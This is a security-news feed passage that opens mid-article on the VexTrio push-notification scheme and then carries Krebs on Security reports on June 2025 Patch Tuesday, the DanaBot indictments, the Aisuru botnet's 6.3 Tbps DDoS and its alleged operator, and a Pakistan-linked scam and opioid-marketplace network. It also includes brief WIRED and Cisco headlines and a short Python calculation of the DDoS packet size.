Asked to comment on the findings by Qurium and Infoblox, Cerutti vehemently denied being associated with VexTrio. Cerutti asserted that his companies all strictly adhere to the regulations of the countries in which they operate, and that they have been completely transparent about all of their operations.

“We are a group operating in the advertising and marketing space, with an affiliate network program,” Cerutti responded. “I am not [going] to say we are perfect, but I strongly declare we have no connection with VexTrio at all.”

“Unfortunately, as a big player in this space we also get to deal with plenty of publisher fraud, sketchy traffic, fake clicks, bots, hacked, listed and resold publisher accounts, etc, etc.,” Cerutti continued. “We bleed lots of money to such malpractices and conduct regular internal screenings and audits in a constant battle to remove bad traffic sources. It is also a highly competitive space, where some upstarts will often play dirty against more established mainstream players like us.”

Working with Qurium, researchers at the security firm Infoblox released details about VexTrio’s infrastructure to their industry partners. Just four days after Qurium published its findings, LosPollos announced it was suspending its push monetization service. Less than a month later, Adspro had rebranded to Aimed Global.

A mind map illustrating some of the key findings and connections in the Infoblox and Qurium investigations.

A REVEALING PIVOT

In March 2025, researchers at GoDaddy chronicled how DollyWay — a malware strain that has consistently redirected victims to VexTrio throughout its eight years of activity — suddenly stopped doing that on November 20, 2024. Virtually overnight, DollyWay and several other malware families that had previously used VexTrio began pushing their traffic through another TDS called Help TDS.

Digging further into historical DNS records and the unique code scripts used by the Help TDS, Infoblox determined it has long enjoyed an exclusive relationship with VexTrio (at least until LosPollos ended its push monetization service in November).

In a report released today, Infoblox said an exhaustive analysis of the JavaScript code, website lures, smartlinks and DNS patterns used by VexTrio and Help TDS linked them with at least four other TDS operators (not counting TacoLoco). Those four entities — Partners House, BroPush, RichAds and RexPush — are all Russia-based push monetization programs that pay affiliates to drive signups for a variety of schemes, but mostly online dating services.

“As Los Pollos push monetization ended, we’ve seen an increase in fake CAPTCHAs that drive user acceptance of push notifications, particularly from Partners House,” the Infoblox report reads. “The relationship of these commercial entities remains a mystery; while they are certainly long-time partners redirecting traffic to one another, and they all have a Russian nexus, there is no overt common ownership.”

Renee Burton, vice president of threat intelligence at Infoblox, said the security industry generally treats the deceptive methods used by VexTrio and other malicious TDSs as a kind of legally grey area that is mostly associated with less dangerous security threats, such as adware and scareware.

But Burton argues that this view is myopic, and helps perpetuate a dark adtech industry that also pushes plenty of straight-up malware, noting that hundreds of thousands of compromised websites around the world every year redirect victims to the tangled web of VexTrio and VexTrio-affiliate TDSs.

“These TDSs are a nefarious threat, because they’re the ones you can connect to the delivery of things like information stealers and scams that cost consumers billions of dollars a year,” Burton said. “From a larger strategic perspective, my takeaway is that Russian organized crime has control of malicious adtech, and these are just some of the many groups involved.”

WHAT CAN YOU DO?

As KrebsOnSecurity warned way back in 2020, it’s a good idea to be very sparing in approving notifications when browsing the Web. In many cases these notifications are benign, but as we’ve seen there are numerous dodgy firms that are paying site owners to install their notification scripts, and then reselling that communications pathway to scammers and online hucksters.

If you’d like to prevent sites from ever presenting notification requests, all of the major browser makers let you do this — either across the board or on a per-website basis. While it is true that blocking notifications entirely can break the functionality of some websites, doing this for any devices you manage on behalf of your less tech-savvy friends or family members might end up saving everyone a lot of headache down the road.

To modify site notification settings in Mozilla Firefox, navigate to Settings, Privacy & Security, Permissions, and click the “Settings” tab next to “Notifications.” That page will display any notifications already permitted and allow you to edit or delete any entries. Tick the box next to “Block new requests asking to allow notifications” to stop them altogether.

In Google Chrome, click the icon with the three dots to the right of the address bar, scroll all the way down to Settings, Privacy and Security, Site Settings, and Notifications. Select the “Don’t allow sites to send notifications” button if you want to banish notification requests forever.

In Apple’s Safari browser, go to Settings, Websites, and click on Notifications in the sidebar. Uncheck the option to “allow websites to ask for permission to send notifications” if you wish to turn off notification requests entirely.

Krebs on Security

Patch Tuesday, June 2025 Edition

By: BrianKrebs — June 11th 2025 at 00:10

Microsoft today released security updates to fix at least 67 vulnerabilities in its Windows operating systems and software. Redmond warns that one of the flaws is already under active attack, and that software blueprints showing how to exploit a pervasive Windows bug patched this month are now public.

The sole zero-day flaw this month is CVE-2025-33053, a remote code execution flaw in the Windows implementation of WebDAV — an HTTP extension that lets users remotely manage files and directories on a server. While WebDAV isn’t enabled by default in Windows, its presence in legacy or specialized systems still makes it a relevant target, said Seth Hoyt, senior security engineer at Automox.

Adam Barnett, lead software engineer at Rapid7, said Microsoft’s advisory for CVE-2025-33053 does not mention that the Windows implementation of WebDAV has been listed as deprecated since November 2023, which in practical terms means that the WebClient service no longer starts by default.

“The advisory also has attack complexity as low, which means that exploitation does not require preparation of the target environment in any way that is beyond the attacker’s control,” Barnett said. “Exploitation relies on the user clicking a malicious link. It’s not clear how an asset would be immediately vulnerable if the service isn’t running, but all versions of Windows receive a patch, including those released since the deprecation of WebClient, like Server 2025 and Windows 11 24H2.”

Microsoft warns that an “elevation of privilege” vulnerability in the Windows Server Message Block (SMB) client (CVE-2025-33073) is likely to be exploited, given that proof-of-concept code for this bug is now public. CVE-2025-33073 has a CVSS risk score of 8.8 (out of 10), and exploitation of the flaw leads to the attacker gaining “SYSTEM” level control over a vulnerable PC.

“What makes this especially dangerous is that no further user interaction is required after the initial connection—something attackers can often trigger without the user realizing it,” said Alex Vovk, co-founder and CEO of Action1. “Given the high privilege level and ease of exploitation, this flaw poses a significant risk to Windows environments. The scope of affected systems is extensive, as SMB is a core Windows protocol used for file and printer sharing and inter-process communication.”

Beyond these highlights, 10 of the vulnerabilities fixed this month were rated “critical” by Microsoft, including eight remote code execution flaws.

Notably absent from this month’s patch batch is a fix for a newly discovered weakness in Windows Server 2025 that allows attackers to act with the privileges of any user in Active Directory. The bug, dubbed “BadSuccessor,” was publicly disclosed by researchers at Akamai on May 21, and several public proof-of-concepts are now available. Tenable’s Satnam Narang said organizations that have at least one Windows Server 2025 domain controller should review permissions for principals and limit those permissions as much as possible.

Adobe has released updates for Acrobat Reader and six other products addressing at least 259 vulnerabilities, most of them in an update for Experience Manager. Mozilla Firefox and Google Chrome both recently released security updates that require a restart of the browser to take effect. The latest Chrome update fixes two zero-day exploits in the browser (CVE-2025-5419 and CVE-2025-4664).

For a detailed breakdown on the individual security updates released by Microsoft today, check out the Patch Tuesday roundup from the SANS Internet Storm Center. Action1 has a breakdown of patches from Microsoft and a raft of other software vendors releasing fixes this month. As always, please back up your system and/or data before patching, and feel free to drop a note in the comments if you run into any problems applying these updates.

WIRED

Cybercriminals Are Hiding Malicious Web Traffic in Plain Sight

By: Lily Hay Newman — June 6th 2025 at 19:05
In an effort to evade detection, cybercriminals are increasingly turning to “residential proxy” services that cover their tracks by making it look like everyday online activity.
WIRED

What Really Happened in the Aftermath of the Lizard Squad Hacks

By: Joe Tidy — June 5th 2025 at 10:00
On Christmas Day in 2014 hackers knocked out the Xbox and PlayStation gaming networks, impacting how video game companies handled cybersecurity for years.
Krebs on Security

Oops: DanaBot Malware Devs Infected Their Own PCs

By: BrianKrebs — May 22nd 2025 at 21:53

The U.S. government today unsealed criminal charges against 16 individuals accused of operating and selling DanaBot, a prolific strain of information-stealing malware that has been sold on Russian cybercrime forums since 2018. The FBI says a newer version of DanaBot was used for espionage, and that many of the defendants exposed their real-life identities after accidentally infecting their own systems with the malware.

DanaBot’s features, as promoted on its support site. Image: welivesecurity.com.

Initially spotted in May 2018 by researchers at the email security firm Proofpoint, DanaBot is a malware-as-a-service platform that specializes in credential theft and banking fraud.

Today, the U.S. Department of Justice unsealed a criminal complaint and indictment from 2022, which said the FBI identified at least 40 affiliates who were paying between $3,000 and $4,000 a month for access to the information stealer platform.

The government says the malware infected more than 300,000 systems globally, causing estimated losses of more than $50 million. The ringleaders of the DanaBot conspiracy are named as Aleksandr Stepanov, 39, a.k.a. “JimmBee,” and Artem Aleksandrovich Kalinkin, 34, a.k.a. “Onix”, both of Novosibirsk, Russia. Kalinkin is an IT engineer for the Russian state-owned energy giant Gazprom. His Facebook profile name is “Maffiozi.”

According to the FBI, there were at least two major versions of DanaBot; the first was sold between 2018 and June 2020, when the malware stopped being offered on Russian cybercrime forums. The government alleges that the second version of DanaBot — emerging in January 2021 — was provided to co-conspirators for use in targeting military, diplomatic and non-governmental organization computers in several countries, including the United States, Belarus, the United Kingdom, Germany, and Russia.

“Unindicted co-conspirators would use the Espionage Variant to compromise computers around the world and steal sensitive diplomatic communications, credentials, and other data from these targeted victims,” reads a grand jury indictment dated Sept. 20, 2022. “This stolen data included financial transactions by diplomatic staff, correspondence concerning day-to-day diplomatic activity, as well as summaries of a particular country’s interactions with the United States.”

The indictment says the FBI in 2022 seized servers used by the DanaBot authors to control their malware, as well as the servers that stored stolen victim data. The government said the server data also show numerous instances in which the DanaBot defendants infected their own PCs, resulting in their credential data being uploaded to stolen data repositories that were seized by the feds.

“In some cases, such self-infections appeared to be deliberately done in order to test, analyze, or improve the malware,” the criminal complaint reads. “In other cases, the infections seemed to be inadvertent – one of the hazards of committing cybercrime is that criminals will sometimes infect themselves with their own malware by mistake.”

Image: welivesecurity.com

A statement from the DOJ says that as part of today’s operation, agents with the Defense Criminal Investigative Service (DCIS) seized the DanaBot control servers, including dozens of virtual servers hosted in the United States. The government says it is now working with industry partners to notify DanaBot victims and help remediate infections. The statement credits a number of security firms with providing assistance to the government, including ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Team CYMRU, and ZScaler.

It’s not unheard of for financially-oriented malicious software to be repurposed for espionage. A variant of the ZeuS Trojan, which was used in countless online banking attacks against companies in the United States and Europe between 2007 and at least 2015, was for a time diverted to espionage tasks by its author.

As detailed in this 2015 story, the author of the ZeuS trojan created a custom version of the malware to serve purely as a spying machine, which scoured infected systems in Ukraine for specific keywords in emails and documents that would likely only be found in classified documents.

The public charging of the 16 DanaBot defendants comes a day after Microsoft joined a slew of tech companies in disrupting the IT infrastructure for another malware-as-a-service offering — Lumma Stealer, which is likewise offered to affiliates under tiered subscription prices ranging from $250 to $1,000 per month. Separately, Microsoft filed a civil lawsuit to seize control over 2,300 domain names used by Lumma Stealer and its affiliates.

Further reading:

Danabot: Analyzing a Fallen Empire

ZScaler blog: DanaBot Launches DDoS Attack Against the Ukrainian Ministry of Defense

Flashpoint: Operation Endgame DanaBot Malware

Team CYMRU: Inside DanaBot’s Infrastructure: In Support of Operation Endgame II

March 2022 criminal complaint v. Artem Aleksandrovich Kalinkin

September 2022 grand jury indictment naming the 16 defendants

Krebs on Security

KrebsOnSecurity Hit With Near-Record 6.3 Tbps DDoS

By: BrianKrebs — May 20th 2025 at 21:30

KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test run for a massive new Internet of Things (IoT) botnet capable of launching crippling digital assaults that few web destinations can withstand. Read on for more about the botnet, the attack, and the apparent creator of this global menace.

For reference, the 6.3 Tbps attack last week was ten times the size of the assault launched against this site in 2016 by the Mirai IoT botnet, which held KrebsOnSecurity offline for nearly four days. The 2016 assault was so large that Akamai – which was providing pro-bono DDoS protection for KrebsOnSecurity at the time — asked me to leave their service because the attack was causing problems for their paying customers.

Since the Mirai attack, KrebsOnSecurity.com has been behind the protection of Project Shield, a free DDoS defense service that Google provides to websites offering news, human rights, and election-related content. Google Security Engineer Damian Menscher told KrebsOnSecurity the May 12 attack was the largest Google has ever handled. In terms of sheer size, it is second only to a very similar attack that Cloudflare mitigated and wrote about in April.

After comparing notes with Cloudflare, Menscher said the botnet that launched both attacks bears the fingerprints of Aisuru, a digital siege machine that first surfaced less than a year ago. Menscher said the attack on KrebsOnSecurity lasted less than a minute, hurling large UDP data packets at random ports at a rate of approximately 585 million data packets per second.

“It was the type of attack normally designed to overwhelm network links,” Menscher said, referring to the throughput connections between and among various Internet service providers (ISPs). “For most companies, this size of attack would kill them.”
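
The reported numbers are internally consistent, which itself says something about the attack’s design: dividing the total throughput by the packet rate yields packets close to the 1,500-byte Ethernet MTU, matching the description of large UDP packets meant to saturate links rather than exhaust a server’s packet-processing capacity.

```python
bits_per_second = 6.3e12      # 6.3 Tbps, as reported
packets_per_second = 585e6    # ~585 million packets per second

bytes_per_packet = bits_per_second / packets_per_second / 8
print(f"~{bytes_per_packet:.0f} bytes per packet")  # ~1346 bytes, near the MTU
```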

A graph depicting the 6.5 Tbps attack mitigated by Cloudflare in April 2025. Image: Cloudflare.

The Aisuru botnet comprises a globally-dispersed collection of hacked IoT devices, including routers, digital video recorders and other systems that are commandeered via default passwords or software vulnerabilities. As documented by researchers at QiAnXin XLab, the botnet was first identified in an August 2024 attack on a large gaming platform.

Aisuru reportedly went quiet after that exposure, only to reappear in November with even more firepower and software exploits. In a January 2025 report, XLab found the new and improved Aisuru (a.k.a. “Airashi”) had incorporated a previously unknown zero-day vulnerability in Cambium Networks cnPilot routers.

NOT FORKING AROUND

The people behind the Aisuru botnet have been peddling access to their DDoS machine in public Telegram chat channels that are closely monitored by multiple security firms. In August 2024, the botnet was rented out in subscription tiers ranging from $150 per day to $600 per week, offering attacks of up to two terabits per second.

“You may not attack any measurement walls, healthcare facilities, schools or government sites,” read a notice posted on Telegram by the Aisuru botnet owners in August 2024.

Interested parties were told to contact the Telegram handle “@yfork” to purchase a subscription. The account @yfork previously used the nickname “Forky,” an identity that has been posting to public DDoS-focused Telegram channels since 2021.

According to the FBI, Forky’s DDoS-for-hire domains have been seized in multiple law enforcement operations over the years. Last year, Forky said on Telegram he was selling the domain stresser[.]best, which saw its servers seized by the FBI in 2022 as part of an ongoing international law enforcement effort aimed at diminishing the supply of and demand for DDoS-for-hire services.

“The operator of this service, who calls himself ‘Forky,’ operates a Telegram channel to advertise features and communicate with current and prospective DDoS customers,” reads an FBI seizure warrant (PDF) issued for stresser[.]best. The FBI warrant stated that on the same day the seizures were announced, Forky posted a link to a story on this blog that detailed the domain seizure operation, adding the comment, “We are buying our new domains right now.”

A screenshot from the FBI’s seizure warrant for Forky’s DDoS-for-hire domains shows Forky announcing the resurrection of their service at new domains.

Approximately ten hours later, Forky posted again, including a screenshot of the stresser[.]best user dashboard, instructing customers to use their saved passwords for the old website on the new one.

A review of Forky’s posts to public Telegram channels — as indexed by the cyber intelligence firms Unit 221B and Flashpoint — reveals a 21-year-old individual who claims to reside in Brazil [full disclosure: Flashpoint is currently an advertiser on this blog].

Since late 2022, Forky’s posts have frequently promoted a DDoS mitigation company and ISP that he operates called botshield[.]io. The Botshield website is connected to a business entity registered in the United Kingdom called Botshield LTD, which lists a 21-year-old woman from Sao Paulo, Brazil as the director. Internet routing records indicate Botshield (AS213613) currently controls several hundred Internet addresses that were allocated to the company earlier this year.

Domaintools.com reports that botshield[.]io was registered in July 2022 to a Kaike Southier Leite in Sao Paulo. A LinkedIn profile by the same name says this individual is a network specialist from Brazil who works in “the planning and implementation of robust network infrastructures, with a focus on security, DDoS mitigation, colocation and cloud server services.”

MEET FORKY

Image: Jaclyn Vernace / Shutterstock.com.

In his posts to public Telegram chat channels, Forky has hardly attempted to conceal his whereabouts or identity. In countless chat conversations indexed by Unit 221B, Forky could be seen talking about everyday life in Brazil, often remarking on the extremely low or high prices in Brazil for a range of goods, from computer and networking gear to narcotics and food.

Reached via Telegram, Forky claimed he was “not involved in this type of illegal actions for years now,” and that the project had been taken over by other unspecified developers. Forky initially told KrebsOnSecurity he had been out of the botnet scene for years, only to concede this wasn’t true when presented with public posts on Telegram from late last year that clearly showed otherwise.

Forky denied being involved in the attack on KrebsOnSecurity, but acknowledged that he helped to develop and market the Aisuru botnet. Forky claims he is now merely a staff member for the Aisuru botnet team, and that he stopped running the botnet roughly two months ago after starting a family. Forky also said the woman named as director of Botshield is related to him.

Forky offered equivocal, evasive responses to a number of questions about the Aisuru botnet and his business endeavors. But on one point he was crystal clear:

“I have zero fear about you, the FBI, or Interpol,” Forky said, asserting that he is now almost entirely focused on his hosting business — Botshield.

Forky declined to discuss the makeup of his ISP’s clientele, or to clarify whether Botshield was more of a hosting provider or a DDoS mitigation firm. However, Forky has posted on Telegram about Botshield successfully mitigating large DDoS attacks launched against other DDoS-for-hire services.

DomainTools finds the same Sao Paulo street address in the registration records for botshield[.]io was used to register several other domains, including cant-mitigate[.]us. The email address in the WHOIS records for that domain is forkcontato@gmail.com, which DomainTools says was used to register the domain for the now-defunct DDoS-for-hire service stresser[.]us, one of the domains seized in the FBI’s 2023 crackdown.

On May 8, 2023, the U.S. Department of Justice announced the seizure of stresser[.]us, along with a dozen other domains offering DDoS services. The DOJ said ten of the 13 domains were reincarnations of services that were seized during a prior sweep in December, which targeted 48 top stresser services (also known as “booters”).

Forky claimed he could find out who attacked my site with Aisuru. But when pressed a day later on the question, Forky said he’d come up empty-handed.

“I tried to ask around, all the big guys are not retarded enough to attack you,” Forky explained in an interview on Telegram. “I didn’t have anything to do with it. But you are welcome to write the story and try to put the blame on me.”

THE GHOST OF MIRAI

The 6.3 Tbps attack last week caused no visible disruption to this site, in part because it was so brief — lasting approximately 45 seconds. DDoS attacks of such magnitude and brevity typically are produced when botnet operators wish to test or demonstrate their firepower for the benefit of potential buyers. Indeed, Google’s Menscher said it is likely that both the May 12 attack and the slightly larger 6.5 Tbps attack against Cloudflare last month were simply tests of the same botnet’s capabilities.

In many ways, the threat posed by the Aisuru/Airashi botnet is reminiscent of Mirai, an innovative IoT malware strain that emerged in the summer of 2016 and successfully out-competed virtually all other IoT malware strains in existence at the time.

As first revealed by KrebsOnSecurity in January 2017, the Mirai authors were two U.S. men who co-ran a DDoS mitigation service — even as they were selling far more lucrative DDoS-for-hire services using the most powerful botnet on the planet.

Less than a week after the Mirai botnet was used in a days-long DDoS against KrebsOnSecurity, the Mirai authors published the source code to their botnet so that they would not be the only ones in possession of it in the event of their arrest by federal investigators.

Ironically, the leaking of the Mirai source is precisely what led to the eventual unmasking and arrest of the Mirai authors, who went on to serve probation sentences that required them to consult with FBI investigators on DDoS investigations. But that leak also rapidly led to the creation of dozens of Mirai botnet clones, many of which were harnessed to fuel their own powerful DDoS-for-hire services.

Menscher told KrebsOnSecurity that as counterintuitive as it may sound, the Internet as a whole would probably be better off if the source code for Aisuru became public knowledge. After all, he said, the people behind Aisuru are in constant competition with other IoT botnet operators who are all striving to commandeer a finite number of vulnerable IoT devices globally.

Such a development would almost certainly cause a proliferation of Aisuru botnet clones, he said, but at least then the overall firepower from each individual botnet would be greatly diminished — or at least within range of the mitigation capabilities of most DDoS protection providers.

Barring a source code leak, Menscher said, it would be nice if someone published the full list of software exploits being used by the Aisuru operators to grow their botnet so quickly.

“Part of the reason Mirai was so dangerous was that it effectively took out competing botnets,” he said. “This attack somehow managed to compromise all these boxes that nobody else knows about. Ideally, we’d want to see that fragmented out, so that no [individual botnet operator] controls too much.”

☐ ☆ ✇ Security – Cisco Blog

Simplifying Zero Trust: How Cisco Security Suites Drive Value

By: Jennifer Golden — May 20th 2025 at 12:00
Discover how Cisco Security Suites are helping organizations achieve zero trust while realizing significant cost savings, improved productivity, and a 110% ROI.
☐ ☆ ✇ WIRED

What to Expect When You’re Convicted

By: Elana Klein — May 20th 2025 at 10:00
When a formerly incarcerated “troubleshooter for the mafia” looked for a second career he chose the thing he knew best. He became a prison consultant for white-collar criminals.
☐ ☆ ✇ Security – Cisco Blog

Developing With Cisco XDR at Cisco Live San Diego ‘25

By: Christopher Van Der Made — May 19th 2025 at 12:00
Join us at Cisco Live San Diego to explore Cisco XDR’s latest innovations, including custom integrations, AI automation, and community features. Don’t miss out!
☐ ☆ ✇ WIRED

US Customs and Border Protection Plans to Photograph Everyone Exiting the US by Car

By: Caroline Haskins — May 9th 2025 at 17:12
A CBP spokesperson tells WIRED that the agency plans to expand its program for real-time face recognition at the border, potentially aiding Trump administration efforts to track people who self-deport.
☐ ☆ ✇ Krebs on Security

Pakistani Firm Shipped Fentanyl Analogs, Scams to US

By: BrianKrebs — May 7th 2025 at 22:22

A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.

In an indictment (PDF) unsealed last month, the U.S. Department of Justice said Dallas-based eWorldTrade “operated an online business-to-business marketplace that facilitated the distribution of synthetic opioids such as isotonitazene and carfentanyl, both significantly more potent than fentanyl.”

Launched in 2017, eWorldTrade[.]com now features a seizure notice from the DOJ. eWorldTrade operated as a wholesale seller of consumer goods, including clothes, machinery, chemicals, automobiles and appliances. The DOJ’s indictment includes no additional details about eWorldTrade’s business, origins or other activity, and at first glance the website might appear to be a legitimate e-commerce platform that also just happened to sell some restricted chemicals.

A screenshot of the eWorldTrade homepage on March 25, 2025. Image: archive.org.

However, an investigation into the company’s founders reveals they are connected to a sprawling network of websites that have a history of extortionate scams involving trademark registration, book publishing, exam preparation, and the design of logos, mobile applications and websites.

Records from the U.S. Patent and Trademark Office (USPTO) show the eWorldTrade mark is owned by an Azneem Bilwani in Karachi (this name also is in the registration records for the now-seized eWorldTrade domain). Mr. Bilwani is perhaps better known as the director of the Pakistan-based IT provider Abtach Ltd., which has been singled out by the USPTO and Google for operating trademark registration scams (the main offices for eWorldtrade and Abtach share the same address in Pakistan).

In November 2021, the USPTO accused Abtach of perpetrating “an egregious scheme to deceive and defraud applicants for federal trademark registrations by improperly altering official USPTO correspondence, overcharging application filing fees, misappropriating the USPTO’s trademarks, and impersonating the USPTO.”

Abtach offered trademark registration at suspiciously low prices compared to legitimate costs of more than $1,500, and claimed they could register a trademark in 24 hours. Abtach reportedly rebranded to Intersys Limited after the USPTO banned Abtach from filing any more trademark applications.

In a note published to its LinkedIn profile, Intersys Ltd. asserted last year that certain scam firms in Karachi were impersonating the company.

FROM AXACT TO ABTACH

Many of Abtach’s employees are former associates of a similar company in Pakistan called Axact that was targeted by Pakistani authorities in a 2015 fraud investigation. Axact came under law enforcement scrutiny after The New York Times ran a front-page story about the company’s most lucrative scam business: Hundreds of sites peddling fake college degrees and diplomas.

People who purchased fake certifications were subsequently blackmailed by Axact employees posing as government officials, who would demand additional payments under threats of prosecution or imprisonment for having bought fraudulent “unauthorized” academic degrees. This practice created a continuous cycle of extortion, internally referred to as “upselling.”

“Axact took money from at least 215,000 people in 197 countries — one-third of them from the United States,” The Times reported. “Sales agents wielded threats and false promises and impersonated government officials, earning the company at least $89 million in its final year of operation.”

Dozens of top Axact employees were arrested, jailed, held for months, tried and sentenced to seven years for various fraud violations. But a 2019 research brief on Axact’s diploma mills found none of those convicted had started their prison sentence, and that several had fled Pakistan and never returned.

“In October 2016, a Pakistan district judge acquitted 24 Axact officials at trial due to ‘not enough evidence’ and then later admitted he had accepted a bribe (of $35,209) from Axact,” reads a history (PDF) published by the American Association of Collegiate Registrars and Admissions Officers.

In 2021, Pakistan’s Federal Investigation Agency (FIA) charged Bilwani and nearly four dozen others — many of them Abtach employees — with running an elaborate trademark scam. The authorities called it “the biggest money laundering case in the history of Pakistan,” and named a number of businesses based in Texas that allegedly helped move the proceeds of cybercrime.

A page from the March 2021 FIA report alleging that Digitonics Labs and Abtach employees conspired to extort and defraud consumers.

The FIA said the defendants operated a large number of websites offering low-cost trademark services to customers, before then “ignoring them after getting the funds and later demanding more funds from clients/victims in the name of up-sale (extortion).” The Pakistani law enforcement agency said that about 75 percent of customers received fake or fabricated trademarks as a result of the scams.

The FIA found Abtach operates in conjunction with a Karachi firm called Digitonics Labs, which earned a monthly revenue of around $2.5 million through the “extortion of international clients in the name of up-selling, the sale of fake/fabricated USPTO certificates, and the maintaining of phishing websites.”

According to the Pakistani authorities, the accused also ran countless scams involving ebook publication and logo creation, wherein customers are subjected to advance-fee fraud and extortion — with the scammers demanding more money for supposed “copyright release” and threatening to release the trademark.

Also charged by the FIA was Junaid Mansoor, the owner of Digitonics Labs in Karachi. Mansoor’s U.K.-registered company Maple Solutions Direct Limited has run at least 700 ads for logo design websites since 2015, the Google Ads Transparency page reports. The company has approximately 88 ads running on Google as of today. 

Junaid Mansoor. Source: youtube/@Olevels․com School.

Mr. Mansoor is actively involved with and promoting a Quran study business called quranmasteronline[.]com, which was founded by Junaid’s brother Qasim Mansoor (Qasim is also named in the FIA criminal investigation). The Google ads promoting quranmasteronline[.]com were paid for by the same account advertising a number of scam websites selling logo and web design services. 

Junaid Mansoor did not respond to requests for comment. An address in Teaneck, New Jersey where Mr. Mansoor previously lived is listed as an official address of exporthub[.]com, a Pakistan-based e-commerce website that appears remarkably similar to eWorldTrade (Exporthub says its offices are in Texas). Interestingly, a search in Google for this domain shows ExportHub currently features multiple listings for fentanyl citrate from suppliers in China and elsewhere.

The CEO of Digitonics Labs is Muhammad Burhan Mirza, a former Axact official who was arrested by the FIA as part of its money laundering and trademark fraud investigation in 2021. In 2023, prosecutors in Pakistan charged Mirza, Mansoor and 14 other Digitonics employees with fraud, impersonating government officials, phishing, cheating and extortion. Mirza’s LinkedIn profile says he currently runs an educational technology/life coach enterprise called TheCoach360, which purports to help young kids “achieve financial independence.”

Reached via LinkedIn, Mr. Mirza denied having anything to do with eWorldTrade or any of its sister companies in Texas.

“Moreover, I have no knowledge as to the companies you have mentioned,” said Mr. Mirza, who did not respond to follow-up questions.

The current disposition of the FIA’s fraud case against the defendants is unclear. The investigation was marred early on by allegations of corruption and bribery. In 2021, Pakistani authorities alleged Bilwani paid a six-figure bribe to FIA investigators. Meanwhile, attorneys for Mr. Bilwani have argued that although their client did pay a bribe, the payment was solicited by government officials. Mr. Bilwani did not respond to requests for comment.

THE TEXAS NEXUS

KrebsOnSecurity has learned that the people and entities at the center of the FIA investigations have built a significant presence in the United States, with a strong concentration in Texas. The Texas businesses promote websites that sell logo and web design, ghostwriting, and academic cheating services. Many of these entities have recently been sued for fraud and breach of contract by angry former customers, who claimed the companies relentlessly upsold them while failing to produce the work as promised.

For example, the FIA complaints named Retrocube LLC and 360 Digital Marketing LLC, two entities that share a street address with eWorldTrade: 1910 Pacific Avenue, Suite 8025, Dallas, Texas. Also incorporated at that Pacific Avenue address is abtach[.]ae, a web design and marketing firm based in Dubai; and intersyslimited[.]com, the new name of Abtach after they were banned by the USPTO. Other businesses registered at this address market services for logo design, mobile app development, and ghostwriting.

A list published in 2021 by Pakistan’s FIA of different front companies allegedly involved in scamming people who are looking for help with trademarks, ghostwriting, logos and web design.

360 Digital Marketing’s website 360digimarketing[.]com is owned by an Abtach front company called Abtech LTD. Meanwhile, business records show 360 Digi Marketing LTD is a U.K. company whose officers include former Abtach director Bilwani; Muhammad Saad Iqbal, formerly Abtach, now CEO of Intersys Ltd; Niaz Ahmed, a former Abtach associate; and Muhammad Salman Yousuf, formerly a vice president at Axact, Abtach, and Digitonics Labs.

Google’s Ads Transparency Center finds 360 Digital Marketing LLC ran at least 500 ads promoting various websites selling ghostwriting services. Another entity tied to Junaid Mansoor — a company called Octa Group Technologies AU — has run approximately 300 Google ads for book publishing services, promoting confusingly named websites like amazonlistinghub[.]com and barnesnoblepublishing[.]co.

360 Digital Marketing LLC ran approximately 500 ads for scam ghostwriting sites.

Rameez Moiz is a Texas resident and former Abtach product manager who has represented 360 Digital Marketing LLC and RetroCube. Moiz told KrebsOnSecurity he stopped working for 360 Digital Marketing in the summer of 2023. Mr. Moiz did not respond to follow-up questions, but an Upwork profile for him states that as of April 2025 he is employed by Dallas-based Vertical Minds LLC.

In April 2025, California resident Melinda Will sued the Texas firm Majestic Ghostwriting — which is doing business as ghostwritingsquad[.]com —  alleging they scammed her out of $100,000 after she hired them to help write her book. Google’s ad transparency page shows Moiz’s employer Vertical Minds LLC paid to run approximately 55 ads for ghostwritingsquad[.]com and related sites.

Google’s ad transparency listing for ghostwriting ads paid for by Vertical Minds LLC.

VICTIMS SPEAK OUT

Ms. Will’s lawsuit is just one of more than two dozen complaints over the past four years wherein plaintiffs sued one of this group’s web design, wiki editing or ghostwriting services. In 2021, a New Jersey man sued Octagroup Technologies, alleging they ripped him off when he paid a total of more than $26,000 for the design and marketing of a web-based mapping service.

The plaintiff in that case did not respond to requests for comment, but his complaint alleges Octagroup and a myriad other companies it contracted with produced minimal work product despite subjecting him to relentless upselling. That case was decided in favor of the plaintiff because the defendants never contested the matter in court.

In 2023, 360 Digital Marketing LLC and Retrocube LLC were sued by a woman who said they scammed her out of $40,000 over a book she wanted help writing. That lawsuit helpfully showed an image of the office front door at 1910 Pacific Ave Suite 8025, which featured the logos of 360 Digital Marketing, Retrocube, and eWorldTrade.

The front door at 1910 Pacific Avenue, Suite 8025, Dallas, Texas.

The lawsuit was filed pro se by Leigh Riley, a 64-year-old career IT professional who paid 360 Digital Marketing to have a company called Talented Ghostwriter co-author and promote a series of books she’d outlined on spirituality and healing.

“The main reason I hired them was because I didn’t understand what I call the formula for writing a book, and I know there’s a lot of marketing that goes into publishing,” Riley explained in an interview. “I know nothing about that stuff, and these guys were convincing that they could handle all aspects of it. Until I discovered they couldn’t write a damn sentence in English properly.”

Riley’s well-documented lawsuit (not linked here because it features a great deal of personal information) includes screenshots of conversations with the ghostwriting team, which was constantly assigning her to new writers and editors, and ghosting her on scheduled conference calls about progress on the project. Riley said she ended up writing most of the book herself because the work they produced was unusable.

“Finally after months of promising the books were printed and on their way, they show up at my doorstep with the wrong title on the book,” Riley said. When she demanded her money back, she said the people helping her with the website to promote the book locked her out of the site.

A conversation snippet from Leigh Riley’s lawsuit against Talented Ghostwriter, aka 360 Digital Marketing LLC. “Other companies once they have you money they don’t even respond or do anything,” the ghostwriting team manager explained.

Riley decided to sue, naming 360 Digital Marketing LLC and Retrocube LLC, among others.  The companies offered to settle the matter for $20,000, which she accepted. “I didn’t have money to hire a lawyer, and I figured it was time to cut my losses,” she said.

Riley said she could have saved herself a great deal of headache by doing some basic research on Talented Ghostwriter, whose website claims the company is based in Los Angeles. According to the California Secretary of State, however, there is no registered entity by that name. Rather, the address claimed by talentedghostwriter[.]com is a vacant office building with a “space available” sign in the window.

